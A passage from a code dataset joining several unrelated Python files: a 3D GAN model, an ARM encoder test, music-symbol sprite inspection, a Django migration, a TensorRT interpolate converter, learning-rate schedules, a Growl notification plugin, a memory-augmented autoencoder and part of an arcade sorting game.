last = Conv3DTranspose(4, kernel_size=ks, strides=2, padding='same', kernel_initializer='he_normal', activation='softmax', name='output_generator')(x)
return Model(inputs=inputs, outputs=last, name='Generator')
def Discriminator():
'''
Discriminator model
'''
inputs = Input((128,128,128,4), name='input_image')
targets = Input((128,128,128,4), name='target_image')
Nfilter_start = 64
depth = 3
ks = 4
def encoder_step(layer, Nf, norm=True):
x = Conv3D(Nf, kernel_size=ks, strides=2, kernel_initializer='he_normal', padding='same')(layer)
if norm:
x = InstanceNormalization()(x)
x = LeakyReLU()(x)
x = Dropout(0.2)(x)
return x
x = Concatenate()([inputs, targets])
for d in range(depth):
if d==0:
x = encoder_step(x, Nfilter_start*np.power(2,d), False)
else:
x = encoder_step(x, Nfilter_start*np.power(2,d))
x = ZeroPadding3D()(x)
x = Conv3D(Nfilter_start*(2**depth), ks, strides=1, padding='valid', kernel_initializer='he_normal')(x)
x = InstanceNormalization()(x)
x = LeakyReLU()(x)
x = ZeroPadding3D()(x)
last = Conv3D(1, ks, strides=1, padding='valid', kernel_initializer='he_normal', name='output_discriminator')(x)
return Model(inputs=[targets, inputs], outputs=last, name='Discriminator')
def ensembler():
start = Input((128,128,128,40))
fin = Conv3D(4, kernel_size=3, kernel_initializer='he_normal', padding='same', activation='softmax')(start)
return Model(inputs=start, outputs=fin, name='Ensembler')
| StarcoderdataPython |
59298 | <reponame>6A/asmsq
from ..testsource import * # pylint: disable=W0614
class ArmTestSource(TestSource):
@property
def name(self) -> str:
return 'arm'
@property
def test_cases(self) -> TestCases:
yield TestCase('should encode single cps instruction', [
self.make_call('cps', 'Mode::USR')
], bytearray(b'\x10\x00\x02\xf1'))
| StarcoderdataPython |
3338878 | from mashcima import Mashcima
from mashcima.Sprite import Sprite
from mashcima.SpriteGroup import SpriteGroup
from mashcima.debug import show_images
from typing import List
import numpy as np
# mc = Mashcima([
# "CVC-MUSCIMA_W-01_N-10_D-ideal.xml",
# "CVC-MUSCIMA_W-01_N-14_D-ideal.xml",
# "CVC-MUSCIMA_W-01_N-19_D-ideal.xml",
#
# # "CVC-MUSCIMA_W-02_N-06_D-ideal.xml",
# # "CVC-MUSCIMA_W-02_N-13_D-ideal.xml",
# # "CVC-MUSCIMA_W-02_N-17_D-ideal.xml",
# ])
mc = Mashcima(use_cache=True)
def inspect(items: List):
batch: List[np.ndarray] = []
BATCH_SIZE = 50
for index, item in enumerate(items):
if isinstance(item, Sprite):
batch.append(item.inspect())
elif isinstance(item, SpriteGroup):
batch.append(item.inspect())
if len(batch) == BATCH_SIZE:
print("Showing indices:", index - BATCH_SIZE + 1, "-", index, "/", len(items))
show_images(batch, row_length=10)
batch = []
if len(batch) != 0:
print("Showing indices:", len(items) - len(batch), "-", len(items) - 1, "/", len(items))
show_images(batch, row_length=10)
###############
# INSPECTIONS #
###############
# DEFAULT SYMBOL SAVING:
# import cv2, os
# s = mc.BREVE_RESTS[0].sprite("rest")
# p = os.path.join(os.path.dirname(__file__), "mashcima/default_symbols/rest_breve")
# cv2.imwrite(p + ".png", s.mask * 255)
# with open(p + ".txt", "w") as f:
# f.write(str(-s.x) + " " + str(-s.y))
# inspect(mc.WHOLE_NOTES)
# inspect(mc.HALF_NOTES)
# inspect(mc.QUARTER_NOTES)
# inspect(mc.EIGHTH_NOTES)
# inspect(mc.SIXTEENTH_NOTES)
# inspect(mc.LONGA_RESTS)
# inspect(mc.BREVE_RESTS)
# inspect(mc.WHOLE_RESTS)
# inspect(mc.HALF_RESTS)
# inspect(mc.QUARTER_RESTS)
# inspect(mc.EIGHTH_RESTS)
# inspect(mc.SIXTEENTH_RESTS)
#
# inspect(mc.FLATS)
# inspect(mc.SHARPS)
# inspect(mc.NATURALS)
#
# inspect(mc.DOTS)
# inspect(mc.LEDGER_LINES)
# inspect(mc.BAR_LINES)
#
# inspect(mc.G_CLEFS)
# inspect(mc.F_CLEFS)
# inspect(mc.C_CLEFS)
#
# inspect(mc.TIME_MARKS["time_0"])
# inspect(mc.TIME_MARKS["time_1"])
# inspect(mc.TIME_MARKS["time_2"])
# inspect(mc.TIME_MARKS["time_3"])
# inspect(mc.TIME_MARKS["time_4"])
# inspect(mc.TIME_MARKS["time_5"])
# inspect(mc.TIME_MARKS["time_6"])
# inspect(mc.TIME_MARKS["time_7"])
# inspect(mc.TIME_MARKS["time_8"])
# inspect(mc.TIME_MARKS["time_9"])
# inspect(mc.TIME_MARKS["time_c"])
| StarcoderdataPython |
1782248 | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-11 18:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AnimeSeries',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mal_id', models.IntegerField(unique=True)),
('image_url', models.CharField(max_length=255, null=True)),
('title', models.CharField(max_length=255, null=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('last_figure_calc', models.DateTimeField(null=True)),
],
),
migrations.CreateModel(
name='Figure',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mfc_id', models.IntegerField(unique=True)),
('barcode', models.CharField(max_length=16, null=True)),
('name', models.CharField(max_length=255)),
('release_date', models.DateTimeField(db_index=True, null=True)),
('price', models.IntegerField(null=True)),
('category', models.IntegerField(null=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.AddField(
model_name='animeseries',
name='figures',
field=models.ManyToManyField(to='anime.Figure'),
),
]
| StarcoderdataPython |
3284380 | import torch
from torch2trt.torch2trt import *
from torch2trt.module_test import add_module_test
from .size import IntWarper
@tensorrt_converter('torch.nn.functional.interpolate')
def convert_interpolate(ctx):
input = ctx.method_args[0]
try:
scale_factor = get_arg(ctx, 'scale_factor', pos=2, default=None)
except KeyError:
scale_factor = None
if isinstance(scale_factor, int):
scale_factor = float(scale_factor)
if isinstance(scale_factor, float):
scale_factor = tuple([scale_factor]*(len(input.shape)-2))
try:
size = get_arg(ctx, 'size', pos=1, default=None)
except KeyError:
size = None
if isinstance(size, int):
size = [size]
try:
mode = get_arg(ctx, 'mode', pos=3, default='nearest')
except KeyError:
mode = 'nearest'
try:
align_corners = get_arg(ctx, 'align_corners', pos=4, default=None)
except KeyError:
align_corners = False
input_trt = trt_(ctx.network, input)
output = ctx.method_return
is_shape_tensor = False
if size is not None:
for s in size:
if isinstance(s, IntWarper):
is_shape_tensor = True
break
if is_shape_tensor:
shape_trt = []
# tuple(input.shape[:(len(input.shape)-len(size))]) +
size = tuple(size)
for s in size:
if isinstance(s, IntWarper):
shape_trt.append(s._trt)
else:
const_shape_trt = trt_(ctx.network, input.new_tensor([s],dtype=torch.int32))
shape_trt.append(const_shape_trt)
pre_input_shape_trt = tensor_trt_get_shape_trt(ctx.network, input_trt, 0, (len(input.shape)-len(size)))
shape_trt = [pre_input_shape_trt] + shape_trt
shape_trt = ctx.network.add_concatenation(shape_trt).get_output(0)
layer = ctx.network.add_resize(input_trt)
if is_shape_tensor:
layer.set_input(1, shape_trt)
elif scale_factor is not None:
scale_factor = (1,)*2 + tuple(scale_factor)
layer.scales = scale_factor
else:
layer.shape = tuple(output.shape)
layer.align_corners = align_corners
if mode=="nearest":
layer.resize_mode = trt.ResizeMode.NEAREST
elif mode=="linear":
layer.resize_mode = trt.ResizeMode.LINEAR
else:
layer.resize_mode = trt.ResizeMode.LINEAR
print("unknown interpolate type, use linear insteed.")
output._trt = layer.get_output(0)
class InterpolateTest(torch.nn.Module):
def __init__(self, size=None, scale_factor=None, mode='nearest'):
super(InterpolateTest, self).__init__()
self.size = size
self.mode = mode
self.scale_factor = scale_factor
def forward(self, x):
align_corners = None
if (self.mode!='nearest'):
align_corners = True
return torch.nn.functional.interpolate(x, size=self.size, scale_factor=self.scale_factor, mode=self.mode, align_corners=align_corners)
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_size_int_nearest():
return InterpolateTest(2, mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_size_3d_nearest():
return InterpolateTest((2,), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_size_4d_nearest():
return InterpolateTest((2, 3), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
def test_interpolate_size_5d_nearest():
return InterpolateTest((2, 3, 4), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_size_int_linear():
return InterpolateTest(2, mode='bilinear')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_size_4d_linear():
return InterpolateTest((2, 3), mode='bilinear')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_scale_int_nearest():
return InterpolateTest(scale_factor=2., mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 4, 6)])
def test_interpolate_scale_3d_nearest():
return InterpolateTest(scale_factor=(4.), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 4, 6)])
def test_interpolate_scale_4d_nearest():
return InterpolateTest(scale_factor=(4., 5.), mode='nearest')
@add_module_test(torch.float32, torch.device('cuda'), [(1, 2, 3, 4, 6)])
def test_interpolate_scale_5d_nearest():
return InterpolateTest(scale_factor=(4., 5., 6.), mode='nearest') | StarcoderdataPython |
4807784 | <filename>src/schedule.py
import torch
import math
class BaseLearningRateSchedule(object):
def __init__(self):
self.step_num = 0
self.decay_rate = 1.
def set_lr(self, optimizer, init_lr):
for param_group in optimizer.param_groups:
param_group['lr'] = init_lr * self.decay_rate
def step(self):
self.step_num += 1
self.update_decay_rate()
def pack_state(self):
pkg = {
"step": self.step_num,
"decay_rate": self.decay_rate,
}
return pkg
def restore_state(self, pkg):
self.step_num = pkg['step']
self.decay_rate = pkg['decay_rate']
def update_decay_rate(self):
raise NotImplementedError()
def compute_polynomial_intep(x, x0, y0, x1, y1, power):
if x < x0:
return y0
elif x > x1:
return y1
else:
if power != 1.0:
f = ((1.0 * x - x0) / (x1 - x0)) ** power
else:
f = ((1.0 * x - x0) / (x1 - x0))
y = y0 + f * (y1 - y0)
return y
def compute_linear_intep(x, x0, y0, x1, y1):
return compute_polynomial_intep(x, x0, y0, x1, y1, 1.0)
class LinearLearningRateSchedule(BaseLearningRateSchedule):
def __init__(self, x0, y0, x1, y1):
super(LinearLearningRateSchedule, self).__init__()
self.x0 = x0
self.y0 = y0
self.x1 = x1
self.y1 = y1
def pack_state(self):
pkg = {
"step": self.step_num,
"decay_rate": self.decay_rate,
"x0": self.x0,
"x1": self.x1,
"y0": self.y0,
"y1": self.y1,
}
return pkg
def restore_state(self, pkg):
self.step_num = pkg['step']
self.decay_rate = pkg['decay_rate']
self.x0 = pkg['x0']
self.x1 = pkg['x1']
self.y0 = pkg['y0']
self.y1 = pkg['y1']
def update_decay_rate(self):
self.decay_rate = compute_linear_intep(self.step_num, self.x0,
self.y0, self.x1, self.y1)
class WarmupLinearLearningRateSchedule(BaseLearningRateSchedule):
def __init__(self, warmup_step, x0, y0, x1, y1):
super(WarmupLinearLearningRateSchedule, self).__init__()
self.warmup_step = warmup_step
self.x0 = x0
self.y0 = y0
self.x1 = x1
self.y1 = y1
def pack_state(self):
pkg = {
"step": self.step_num,
"decay_rate": self.decay_rate,
"warmup_step": self.warmup_step,
"x0": self.x0,
"x1": self.x1,
"y0": self.y0,
"y1": self.y1,
}
return pkg
def restore_state(self, pkg):
self.step_num = pkg['step']
self.decay_rate = pkg['decay_rate']
self.warmup_step = pkg['warmup_step']
self.x0 = pkg['x0']
self.x1 = pkg['x1']
self.y0 = pkg['y0']
self.y1 = pkg['y1']
def update_decay_rate(self):
dc0 = compute_linear_intep(self.step_num, 0,
0, self.warmup_step, self.y0)
dc1 = compute_linear_intep(self.step_num, self.x0,
self.y0, self.x1, self.y1)
self.decay_rate = min(dc0, dc1) | StarcoderdataPython |
3281099 | <filename>apprise/plugins/NotifyGrowl/NotifyGrowl.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 <NAME> <<EMAIL>>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from .gntp import notifier
from .gntp import errors
from ..NotifyBase import NotifyBase
from ...common import NotifyImageSize
from ...common import NotifyType
# Priorities
class GrowlPriority(object):
LOW = -2
MODERATE = -1
NORMAL = 0
HIGH = 1
EMERGENCY = 2
GROWL_PRIORITIES = (
GrowlPriority.LOW,
GrowlPriority.MODERATE,
GrowlPriority.NORMAL,
GrowlPriority.HIGH,
GrowlPriority.EMERGENCY,
)
GROWL_NOTIFICATION_TYPE = "New Messages"
class NotifyGrowl(NotifyBase):
"""
A wrapper to Growl Notifications
"""
# The default descriptive name associated with the Notification
service_name = 'Growl'
# The services URL
service_url = 'http://growl.info/'
# The default protocol
protocol = 'growl'
# A URL that takes you to the setup/help of the specific protocol
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_growl'
# Allows the user to specify the NotifyImageSize object
image_size = NotifyImageSize.XY_72
# Disable throttle rate for Growl requests since they are normally
# local anyway
request_rate_per_sec = 0
# A title can not be used for Growl Messages. Setting this to zero will
# cause any title (if defined) to get placed into the message body.
title_maxlen = 0
# Limit results to just the first 10 line otherwise there is just to much
# content to display
body_max_line_count = 2
# Default Growl Port
default_port = 23053
def __init__(self, priority=None, version=2, **kwargs):
"""
Initialize Growl Object
"""
super(NotifyGrowl, self).__init__(**kwargs)
if not self.port:
self.port = self.default_port
# The Priority of the message
if priority not in GROWL_PRIORITIES:
self.priority = GrowlPriority.NORMAL
else:
self.priority = priority
# Always default the sticky flag to False
self.sticky = False
# Store Version
self.version = version
payload = {
'applicationName': self.app_id,
'notifications': [GROWL_NOTIFICATION_TYPE, ],
'defaultNotifications': [GROWL_NOTIFICATION_TYPE, ],
'hostname': self.host,
'port': self.port,
}
if self.password is not None:
payload['password'] = <PASSWORD>
self.logger.debug('Growl Registration Payload: %s' % str(payload))
self.growl = notifier.GrowlNotifier(**payload)
try:
self.growl.register()
self.logger.debug(
'Growl server registration completed successfully.'
)
except errors.NetworkError:
self.logger.warning(
'A network error occured sending Growl '
'notification to %s.' % self.host)
raise TypeError(
'A network error occured sending Growl '
'notification to %s.' % self.host)
except errors.AuthError:
self.logger.warning(
'An authentication error occured sending Growl '
'notification to %s.' % self.host)
raise TypeError(
'An authentication error occured sending Growl '
'notification to %s.' % self.host)
except errors.UnsupportedError:
self.logger.warning(
'An unsupported error occured sending Growl '
'notification to %s.' % self.host)
raise TypeError(
'An unsupported error occured sending Growl '
'notification to %s.' % self.host)
return
def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
"""
Perform Growl Notification
"""
icon = None
if self.version >= 2:
# URL Based
icon = self.image_url(notify_type)
else:
# Raw
icon = self.image_raw(notify_type)
payload = {
'noteType': GROWL_NOTIFICATION_TYPE,
'title': title,
'description': body,
'icon': icon is not None,
'sticky': False,
'priority': self.priority,
}
self.logger.debug('Growl Payload: %s' % str(payload))
# Update icon of payload to be raw data; this is intentionally done
# here after we spit the debug message above (so we don't try to
# print the binary contents of an image
payload['icon'] = icon
# Always call throttle before any remote server i/o is made
self.throttle()
try:
response = self.growl.notify(**payload)
if not isinstance(response, bool):
self.logger.warning(
'Growl notification failed to send with response: %s' %
str(response),
)
else:
self.logger.info('Sent Growl notification.')
except errors.BaseError as e:
# Since Growl servers listen for UDP broadcasts, it's possible
# that you will never get to this part of the code since there is
# no acknowledgement as to whether it accepted what was sent to it
# or not.
# However, if the host/server is unavailable, you will get to this
# point of the code.
self.logger.warning(
'A Connection error occured sending Growl '
'notification to %s.' % self.host)
self.logger.debug('Growl Exception: %s' % str(e))
# Return; we're done
return False
return True
def url(self):
"""
Returns the URL built dynamically based on specified arguments.
"""
_map = {
GrowlPriority.LOW: 'low',
GrowlPriority.MODERATE: 'moderate',
GrowlPriority.NORMAL: 'normal',
GrowlPriority.HIGH: 'high',
GrowlPriority.EMERGENCY: 'emergency',
}
# Define any arguments set
args = {
'format': self.notify_format,
'overflow': self.overflow_mode,
'priority':
_map[GrowlPriority.NORMAL] if self.priority not in _map
else _map[self.priority],
'version': self.version,
}
auth = ''
if self.password:
auth = '{password}@'.format(
password=self.quote(self.user, safe=''),
)
return '{schema}://{auth}{hostname}{port}/?{args}'.format(
schema=self.secure_protocol if self.secure else self.protocol,
auth=auth,
hostname=self.host,
port='' if self.port is None or self.port == self.default_port
else ':{}'.format(self.port),
args=self.urlencode(args),
)
@staticmethod
def parse_url(url):
"""
Parses the URL and returns enough arguments that can allow
us to substantiate this object.
"""
results = NotifyBase.parse_url(url)
if not results:
# We're done early as we couldn't load the results
return results
# Apply our settings now
version = None
if 'version' in results['qsd'] and len(results['qsd']['version']):
# Allow the user to specify the version of the protocol to use.
try:
version = int(
NotifyBase.unquote(
results['qsd']['version']).strip().split('.')[0])
except (AttributeError, IndexError, TypeError, ValueError):
NotifyBase.logger.warning(
'An invalid Growl version of "%s" was specified and will '
'be ignored.' % results['qsd']['version']
)
pass
if 'priority' in results['qsd'] and len(results['qsd']['priority']):
_map = {
'l': GrowlPriority.LOW,
'm': GrowlPriority.MODERATE,
'n': GrowlPriority.NORMAL,
'h': GrowlPriority.HIGH,
'e': GrowlPriority.EMERGENCY,
}
try:
results['priority'] = \
_map[results['qsd']['priority'][0].lower()]
except KeyError:
# No priority was set
pass
# Because of the URL formatting, the password is actually where the
# username field is. For this reason, we just preform this small hack
# to make it (the URL) conform correctly. The following strips out the
# existing password entry (if exists) so that it can be swapped with
# the new one we specify.
if results.get('password', None) is None:
results['password'] = results.get('user', None)
if version:
results['version'] = version
return results
| StarcoderdataPython |
1709349 | <reponame>saikumarkethi/memae-anomaly-detection
from __future__ import absolute_import, print_function
import torch
from torch import nn
from models import MemModule
class AutoEncoderCov3DMem(nn.Module):
def __init__(self, chnum_in, mem_dim, shrink_thres=0.0025):
super(AutoEncoderCov3DMem, self).__init__()
print('AutoEncoderCov3DMem')
self.chnum_in = chnum_in
feature_num = 128
feature_num_2 = 96
feature_num_x2 = 256
self.encoder = nn.Sequential(
nn.Conv3d(self.chnum_in, feature_num_2, (3, 3, 3), stride=(1, 2, 2), padding=(1, 1, 1)),
nn.BatchNorm3d(feature_num_2),
nn.LeakyReLU(0.2, inplace=True),
nn.Conv3d(feature_num_2, feature_num, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1)),
nn.BatchNorm3d(feature_num),
nn.LeakyReLU(0.2, inplace=True),
nn.Conv3d(feature_num, feature_num_x2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1)),
nn.BatchNorm3d(feature_num_x2),
nn.LeakyReLU(0.2, inplace=True),
nn.Conv3d(feature_num_x2, feature_num_x2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1)),
nn.BatchNorm3d(feature_num_x2),
nn.LeakyReLU(0.2, inplace=True)
)
self.mem_rep = MemModule(mem_dim=mem_dim, fea_dim=feature_num_x2, shrink_thres =shrink_thres)
self.decoder = nn.Sequential(
nn.ConvTranspose3d(feature_num_x2, feature_num_x2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1),
output_padding=(1, 1, 1)),
nn.BatchNorm3d(feature_num_x2),
nn.LeakyReLU(0.2, inplace=True),
nn.ConvTranspose3d(feature_num_x2, feature_num, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1),
output_padding=(1, 1, 1)),
nn.BatchNorm3d(feature_num),
nn.LeakyReLU(0.2, inplace=True),
nn.ConvTranspose3d(feature_num, feature_num_2, (3, 3, 3), stride=(2, 2, 2), padding=(1, 1, 1),
output_padding=(1, 1, 1)),
nn.BatchNorm3d(feature_num_2),
nn.LeakyReLU(0.2, inplace=True),
nn.ConvTranspose3d(feature_num_2, self.chnum_in, (3, 3, 3), stride=(1, 2, 2), padding=(1, 1, 1),
output_padding=(0, 1, 1))
)
def forward(self, x):
f = self.encoder(x)
res_mem = self.mem_rep(f)
f = res_mem['output']
att = res_mem['att']
output = self.decoder(f)
return {'output': output, 'att': att}
| StarcoderdataPython |
1607851 | """
Starting Template
Once you have learned how to use classes, you can begin your program with this
template.
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.starting_template
"""
import arcade
import random
import math
from Criteria import *
SCREEN_WIDTH = 1280
SCREEN_HEIGHT = 720
SCREEN_TITLE = "Triplicate"
DEFAULT_GRAVITY = -3
RESOURCE_PATH = "resources"
levels = []
# ON_KEY_RELEASE apply negative vector on key release.
ON_KEY_RELEASE = False
class ObjectLoader:
def __init__(self):
pass
def load(self, tick):
pass
class Factory:
def create(self):
pass
class FormFactory(Factory):
def __init__(self, color, val):
self.color = color
self.val = val
def create(self):
return Form(self.color, self.val)
class CarFactory(Factory):
def __init__(self, color, val):
self.color = color
self.val = val
def create(self):
return SwervingCar1Up(self.color, self.val)
class ShipFactory(Factory):
def __init__(self, color, val, level):
self.color = color
self.val = val
self.level = level
def create(self):
return Ship(self.color, self.val, self.level)
class PoopFactory(Factory):
def __init__(self, color, val):
self.color = color
self.val = val
def create(self):
return Poop(self.color, self.val)
class FactoryWeight:
def __init__(self, factory, r):
self.factory = factory
self.range = r
def GetLaneCenter(j):
return (SCREEN_WIDTH / 2) - ((160 * 5)/2) + (j * 160) + 80
class WeightedObjectLaneLoader(ObjectLoader):
def __init__(self, tr, factories):
super().__init__()
self.factories = factories
self.tr = tr
self.t = 0
def load(self, tick):
if tick % self.tr == 0:
self.t += 1
x = random.randrange(0, 100)
for factory in self.factories:
if x in factory.range:
o = factory.factory.create()
o.center_x = GetLaneCenter(random.randrange(0, 5))
return o
return None
class WeightedObjectLoader(ObjectLoader):
def __init__(self, tr, factories):
super().__init__()
self.factories = factories
self.tr = tr
self.t = 0
def load(self, tick):
if tick % self.tr == 0:
self.t += 1
x = random.randrange(0, 100)
for factory in self.factories:
if x in factory.range:
return factory.factory.create()
return None
class SequenceFactoryObjectLoader(ObjectLoader):
def __init__(self, tr, objects):
self.tr = tr
self.objects = objects
def load(self, tick):
if tick % self.tr == 0:
self.t += 1
if len(self.objects) > 0:
return self.objects.pop().load()
return None
class SequenceObjectLoader(ObjectLoader):
def __init__(self, tr, objects):
self.tr = tr
self.objects = objects
def load(self, tick):
if tick % self.tr == 0:
self.t += 1
return self.objects.pop()
class RBObjectLoader(ObjectLoader):
def __init__(self):
self.Toggle = True
def load(self, tick):
if tick % 180 == 0:
self.Toggle = not self.Toggle
if self.Toggle:
return Form((255, 0, 0, 255), "R")
else:
return Form((0, 0, 255, 255), "B")
class RGBObjectLoader(ObjectLoader):
def __init__(self):
self.t = 0
def load(self, tick):
if tick % 180 == 0:
self.t += 1
x = self.t % 3
if x == 0:
return Form((255, 0, 0, 255), "R")
elif x == 1:
return Form((0, 255, 0, 255), "G")
elif x == 2:
return Form((0, 0, 255, 255), "B")
class RBPObjectLoader(ObjectLoader):
def __init__(self):
self.t = 0
def load(self, tick):
if tick % 180 == 0:
self.t += 1
x = random.randrange(0, 3)
if x == 0:
return Form((255, 0, 0, 255), "R")
elif x == 1:
return Poop((0, 255, 0, 255), "G")
elif x == 2:
return Form((0, 0, 255, 255), "B")
class RGBPObjectLoader(ObjectLoader):
def __init__(self, tr):
self.t = 0
self.tr = tr
def load(self, tick):
if tick % self.tr == 0:
self.t += 1
x = random.randrange(0, 4)
if x == 0:
return Form((255, 0, 0, 255), "R")
elif x == 1:
return Form((0, 255, 0, 255), "G")
elif x == 2:
return Form((0, 0, 255, 255), "B")
elif x == 3:
return Poop((255, 255, 255, 255), "S")
class Level:
def __init__(self):
# You may want many lists. Lists for coins, monsters, etc.
self.bucket_list = None
self.object_list = None
self.object_loader = None
# This holds the background images. If you don't want changing
# background images, you can delete this part.
self.background = None
self.music = None
self.tick = 0
self.selected_bucket = None
self.score = 0
self.run = True
def update(self):
if self.run:
self.tick += 1
if self.object_loader is not None:
ret = self.object_loader.load(self.tick)
if ret is not None:
self.object_list.append(ret)
if self.bucket_list is not None:
for bucket in self.bucket_list:
bucket.update()
if self.object_list is not None:
hit_list = bucket.collides_with_list(self.object_list)
for obj in hit_list:
if bucket.score(obj):
self.score += obj.pass_val
else:
self.score += obj.fail_val
self.object_list.remove(obj)
if self.object_list is not None:
for obj in self.object_list:
obj.update()
if obj.center_y < 5:
self.score += obj.miss_val
self.object_list.remove(obj)
def draw(self):
if self.background is not None:
arcade.draw_lrwh_rectangle_textured(0, 0,
SCREEN_WIDTH, SCREEN_HEIGHT,
self.background)
if self.bucket_list is not None:
self.bucket_list.draw()
if self.object_list is not None:
self.object_list.draw()
if self.selected_bucket is not None:
arcade.draw_rectangle_outline(self.bucket_list[self.selected_bucket].center_x,
self.bucket_list[self.selected_bucket].center_y,
self.bucket_list[self.selected_bucket].height * 1.2,
self.bucket_list[self.selected_bucket].width * 1.2,
self.bucket_list[self.selected_bucket].color, (self.tick % 12) + 2, 0)
arcade.draw_text("Time Left {:d}".format(int((self.length - self.tick) / 60)), (SCREEN_WIDTH / 6) * 4,
SCREEN_HEIGHT - (SCREEN_HEIGHT / 10), arcade.color.BLACK, 60)
arcade.draw_text("Score: {}".format(self.score), 0, (SCREEN_HEIGHT / 10) * 9,
arcade.color.RED, 64)
if self.tick > self.length:
arcade.draw_text("GAME OVER", (SCREEN_WIDTH / 5) * 1, (SCREEN_HEIGHT / 6) * 3, arcade.color.BLACK, 128)
def next_bucket(self):
# print(self.selected_bucket)
if self.selected_bucket is None and len(self.bucket_list) > 0:
self.selected_bucket = 0
else:
self.selected_bucket += 1
if self.selected_bucket >= len(self.bucket_list):
self.selected_bucket = 0
# print(self.selected_bucket)
# Maybe play a sound here?
def prev_bucket(self):
# print(self.selected_bucket)
if self.selected_bucket is None and len(self.bucket_list) > 0:
self.selected_bucket = len(self.bucket_list) - 1
else:
self.selected_bucket -= 1
if self.selected_bucket < 0:
self.selected_bucket = len(self.bucket_list) - 1
def move_bucket(self, x):
if self.selected_bucket is not None:
self.bucket_list[self.selected_bucket].v_x += x
def stop_bucket(self):
if self.selected_bucket is not None:
self.bucket_list[self.selected_bucket].v_x = 0
def stop_all_buckets(self):
for x in self.bucket_list:
x.v_x = 0
def on_key_press(self, key, key_modifiers):
"""
Called whenever a key on the keyboard is pressed.
For a full list of keys, see:
http://arcade.academy/arcade.key.html
"""
if key == arcade.key.TAB:
if key_modifiers & arcade.key.MOD_SHIFT:
self.prev_bucket()
else:
self.next_bucket()
elif key == arcade.key.LEFT or key == arcade.key.A:
self.move_bucket(-1)
elif key == arcade.key.RIGHT or key == arcade.key.D:
self.move_bucket(1)
elif key == arcade.key.S:
self.stop_all_buckets()
elif key == arcade.key.SPACE:
self.stop_bucket()
elif key == arcade.key.Q:
exit(0)
def on_key_release(self, key, key_modifiers):
"""
Called whenever the user lets off a previously pressed key.
"""
if ON_KEY_RELEASE:
if key == arcade.key.LEFT:
self.move_bucket(1)
elif key == arcade.key.RIGHT:
self.move_bucket(-1)
class SpaceLevel(Level):
def __init__(self):
super().__init__()
self.bucket_list = arcade.SpriteList()
self.bucket_list.append(Bucket((255, 0, 0, 255), [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
self.bucket_list[0].center_x = SCREEN_WIDTH / 4
self.selected_bucket = 0
self.object_list = arcade.SpriteList()
self.length = 60 * 120
self.tree_tick = False
self.background = arcade.load_texture("resources/Background-4.png")
self.object_loader = WeightedObjectLaneLoader(60, [FactoryWeight(ShipFactory((255, 0, 0, 255), "R", self), range(0, 10)),
FactoryWeight(ShipFactory((0, 255, 0, 255), "G", self), range(40, 50)),
FactoryWeight(ShipFactory((0, 0, 255, 255), "B", self), range(50, 90)),
FactoryWeight(PoopFactory((255, 255, 255, 255), "R"), range(95, 100))])
def update(self):
super().update()
if not self.run:
return
if (self.tick % 60) == 0:
self.tree_tick = not self.tree_tick
tree1 = Tree((255,255,255,255),"Tree")
tree1.center_x = GetLaneCenter(-1) + (-80 if self.tree_tick else 0)
tree1.center_y = SCREEN_HEIGHT + 20
tree2 = Tree((255,255,255,255),"Tree")
tree2.center_x = GetLaneCenter(5) + (80 if self.tree_tick else 0)
tree2.center_y = SCREEN_HEIGHT + 20
self.object_list.append(tree1)
self.object_list.append(tree2)
if self.tick > self.length:
self.run = False
def draw_road(self, cx, cy, sx, sy, offset):
